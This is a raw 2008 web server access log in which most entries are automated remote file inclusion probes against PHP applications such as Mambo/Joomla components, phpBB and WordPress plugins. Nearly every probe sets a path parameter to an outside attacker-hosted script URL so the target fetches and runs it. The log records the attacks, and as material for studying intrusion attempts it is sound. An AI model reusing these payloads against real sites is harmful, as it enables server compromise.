72.47.202.20 - - [27/Jan/2008:18:19:54 -0800] "GET /logs//index1.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:18:19:55 -0800] "GET //index1.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.225.199.128 - - [27/Jan/2008:18:20:14 -0800] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.225.199.128 - - [27/Jan/2008:18:20:14 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.225.199.128 - - [27/Jan/2008:18:20:14 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.111.176.90 - - [27/Jan/2008:18:20:22 -0800] "GET /logs/access_070826.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [27/Jan/2008:18:20:23 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.172.34.73 - - [27/Jan/2008:18:21:15 -0800] "GET /logs/access_070827.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.172.34.73 - - [27/Jan/2008:18:21:15 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.172.34.73 - - [27/Jan/2008:18:21:16 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.225.199.128 - - [27/Jan/2008:18:21:21 -0800] "GET /logs/access_070827.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:18:21:33 -0800] "GET /logs//index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:18:21:33 -0800] "GET //index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:18:22:27 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:18:22:27 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.17.114.133 - - [27/Jan/2008:18:23:29 -0800] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.17.114.133 - - [27/Jan/2008:18:23:30 -0800] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.5.250.201 - - [27/Jan/2008:18:23:34 -0800] "GET /logs/access_071105.log/vwar/convert/mvcw.php?step=1&vwar_root=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.5.250.201 - - [27/Jan/2008:18:23:34 -0800] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.5.250.201 - - [27/Jan/2008:18:23:35 -0800] "GET /logs/access_071105.log/vwar/convert/mvcw.php?step=1&vwar_root=http://happystation.biz/Smileys/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.5.250.201 - - [27/Jan/2008:18:23:35 -0800] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://happystation.biz/Smileys/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.172.34.73 - - [27/Jan/2008:18:23:58 -0800] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.10.208.226 - - [27/Jan/2008:18:25:21 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
81.10.208.226 - - [27/Jan/2008:18:25:21 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://lovefromsenpai.com/anime/images/dvd/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
89.111.176.90 - - [27/Jan/2008:18:25:33 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.149.90.29 - - [27/Jan/2008:18:25:41 -0800] "GET /logs/access_071217.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.149.90.29 - - [27/Jan/2008:18:25:41 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.149.90.29 - - [27/Jan/2008:18:25:42 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.spr0x.kit.net/idid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:26:35 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:26:35 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:27:22 -0800] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:27:22 -0800] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:27:22 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:18:27:28 -0800] "GET /logs/access_071217.log//inc/header.php/step_one.php?server_inc=http://www.cartographia.org/administrator/abc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.47.202.20 - - [27/Jan/2008:18:27:30 -0800] "GET /logs/access_071217.log//inc/header.php/step_one.php?server_inc=http://www.cartographia.org/administrator/remote.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:28:47 -0800] "GET /logs/access_071105.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
88.218.97.19 - - [27/Jan/2008:18:28:56 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.usw-squad.net/modules/Neos_Chronos/upload/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.20.70 - - [27/Jan/2008:18:31:21 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.48.111.178 - - [27/Jan/2008:18:32:37 -0800] "GET /logs/index2.php?page=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.48.111.178 - - [27/Jan/2008:18:32:37 -0800] "GET /index2.php?page=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:18:33:07 -0800] "GET /logs/access_071224.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:18:33:07 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:18:33:07 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.111.176.90 - - [27/Jan/2008:18:33:10 -0800] "GET /logs/access_071217.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.114.141.247 - - [27/Jan/2008:18:33:20 -0800] "GET /logs/access_080107.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.69.224.10 - - [27/Jan/2008:18:33:26 -0800] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://avarus.es/SolidFemale/media/selops/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.69.224.10 - - [27/Jan/2008:18:33:26 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://avarus.es/SolidFemale/media/selops/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.69.224.10 - - [27/Jan/2008:18:33:26 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://avarus.es/SolidFemale/media/selops/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
189.20.55.20 - - [27/Jan/2008:18:35:31 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.210.85.226 - - [27/Jan/2008:18:36:04 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.strum-service.com.ua/img/r.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.34.177.135 - - [27/Jan/2008:18:36:47 -0800] "GET /logs/access_071210.log/config.php?rootBase=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.34.177.135 - - [27/Jan/2008:18:36:47 -0800] "GET /config.php?rootBase=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.34.177.135 - - [27/Jan/2008:18:36:47 -0800] "GET /logs/config.php?rootBase=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.34.177.135 - - [27/Jan/2008:18:36:48 -0800] "GET /logs/access_071105.log/config.php?rootBase=http://www.skd.it/vwar/admin/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:18:37:34 -0800] "GET /logs/access_071224.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:18:37:34 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:18:37:35 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.22.162.60 - - [27/Jan/2008:18:37:44 -0800] "GET /logs/access_080107.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/log????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:38:56 -0800] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:38:56 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:38:56 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
88.149.204.130 - - [27/Jan/2008:18:39:05 -0800] "GET /logs/index2.php?page=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
88.149.204.130 - - [27/Jan/2008:18:39:06 -0800] "GET /index2.php?page=http://?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:18:40:53 -0800] "GET /logs/access_071210.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:18:41:23 -0800] "GET /logs/access_070827.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:42:24 -0800] "GET /logs/access_070827.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
72.35.237.170 - - [27/Jan/2008:18:42:44 -0800] "GET /logs/access_070826.log//includes/dbal.php?eqdkp_root_path=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
72.35.237.170 - - [27/Jan/2008:18:42:49 -0800] "GET //includes/dbal.php?eqdkp_root_path=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
72.35.237.170 - - [27/Jan/2008:18:42:49 -0800] "GET /logs//includes/dbal.php?eqdkp_root_path=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:42:54 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:42:55 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:18:43:09 -0800] "GET /logs/access_071224.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:18:43:10 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:18:43:11 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
125.245.27.77 - - [27/Jan/2008:18:43:48 -0800] "GET /logs/access_080107.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.30.214.235 - - [27/Jan/2008:18:44:04 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
207.178.128.116 - - [27/Jan/2008:18:44:19 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://claroline.lct-net.cl/www1???????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.35.237.170 - - [27/Jan/2008:18:44:47 -0800] "GET /logs/access_070826.log//includes/dbal.php?eqdkp_root_path=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
72.35.237.170 - - [27/Jan/2008:18:44:48 -0800] "GET //includes/dbal.php?eqdkp_root_path=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
72.35.237.170 - - [27/Jan/2008:18:44:48 -0800] "GET /logs//includes/dbal.php?eqdkp_root_path=http://64.22.125.219/r0x/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
213.83.33.210 - - [27/Jan/2008:18:45:08 -0800] "GET //oneadmin/config.php?path[docroot]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.195.44.88 - - [27/Jan/2008:18:45:24 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
216.223.125.188 - - [27/Jan/2008:18:46:03 -0800] "GET /send_reminders.php?includedir=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
65.69.224.10 - - [27/Jan/2008:18:46:16 -0800] "GET /logs/access_071210.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://avarus.es/SolidFemale/media/selops/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:46:31 -0800] "GET /logs/access_070826.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:46:32 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:46:32 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
85.237.201.51 - - [27/Jan/2008:18:47:00 -0800] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/czr/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.55.208.228 - - [27/Jan/2008:18:49:32 -0800] "GET /tmp/?D=D HTTP/1.0" 200 504 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
85.237.201.51 - - [27/Jan/2008:18:49:35 -0800] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://h1.ripway.com/czr/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.237.201.51 - - [27/Jan/2008:18:49:35 -0800] "GET //skin/zero_vote/error.php?dir=http://h1.ripway.com/czr/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.237.201.51 - - [27/Jan/2008:18:49:36 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://h1.ripway.com/czr/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:18:50:33 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
74.6.22.166 - - [27/Jan/2008:18:55:15 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.22.166 - - [27/Jan/2008:18:55:42 -0800] "GET /logs/access_070910.log HTTP/1.0" 200 3278788 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
80.199.102.117 - - [27/Jan/2008:18:55:44 -0800] "GET /logs/access_071105.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.venox.xpg.com.br/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.199.102.117 - - [27/Jan/2008:18:55:44 -0800] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://www.venox.xpg.com.br/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.199.102.117 - - [27/Jan/2008:18:55:45 -0800] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://www.venox.xpg.com.br/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
88.218.97.19 - - [27/Jan/2008:18:55:46 -0800] "GET /logs/access_071105.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.usw-squad.net/modules/Neos_Chronos/upload/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
88.218.97.19 - - [27/Jan/2008:18:55:46 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.usw-squad.net/modules/Neos_Chronos/upload/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.48.111.178 - - [27/Jan/2008:18:56:13 -0800] "GET /logs/access_080107.log/index2.php?page=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
200.29.188.25 - - [27/Jan/2008:18:56:47 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
80.67.20.50 - - [27/Jan/2008:18:57:16 -0800] "GET /logs/access_070826.log//includes/dbal.php?eqdkp_root_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.20.50 - - [27/Jan/2008:18:57:16 -0800] "GET //includes/dbal.php?eqdkp_root_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.67.20.50 - - [27/Jan/2008:18:57:16 -0800] "GET /logs//includes/dbal.php?eqdkp_root_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
201.34.32.66 - - [27/Jan/2008:18:57:43 -0800] "GET /send_reminders.php?includedir=http://www.vip-phone.co.hu/images/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.58.140.237 - - [27/Jan/2008:18:59:32 -0800] "GET /logs/access_071217.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.140.237 - - [27/Jan/2008:18:59:37 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.48.111.178 - - [27/Jan/2008:18:59:40 -0800] "GET /logs/access_071210.log/index2.php?page=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.58.140.237 - - [27/Jan/2008:19:00:03 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.17.114.133 - - [27/Jan/2008:19:00:09 -0800] "GET /logs/access_071224.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.67.20.50 - - [27/Jan/2008:19:00:12 -0800] "GET /logs/access.log//includes/dbal.php?eqdkp_root_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.112.140.125 - - [27/Jan/2008:19:00:20 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.talamasc.de/forum/lol? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
80.93.92.73 - - [27/Jan/2008:19:00:20 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions//mygallerybrowser.php?myPath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.164.242.195 - - [27/Jan/2008:19:00:21 -0800] "GET /logs/access_080107.log//wp-content/plugins/mygallery/myfunctions//mygallerybrowser.php?myPath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.164.242.195 - - [27/Jan/2008:19:00:21 -0800] "GET /logs/access_080107.log//wp-content/plugins/mygallery/myfunctions//mygallerybrowser.php?myPath=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
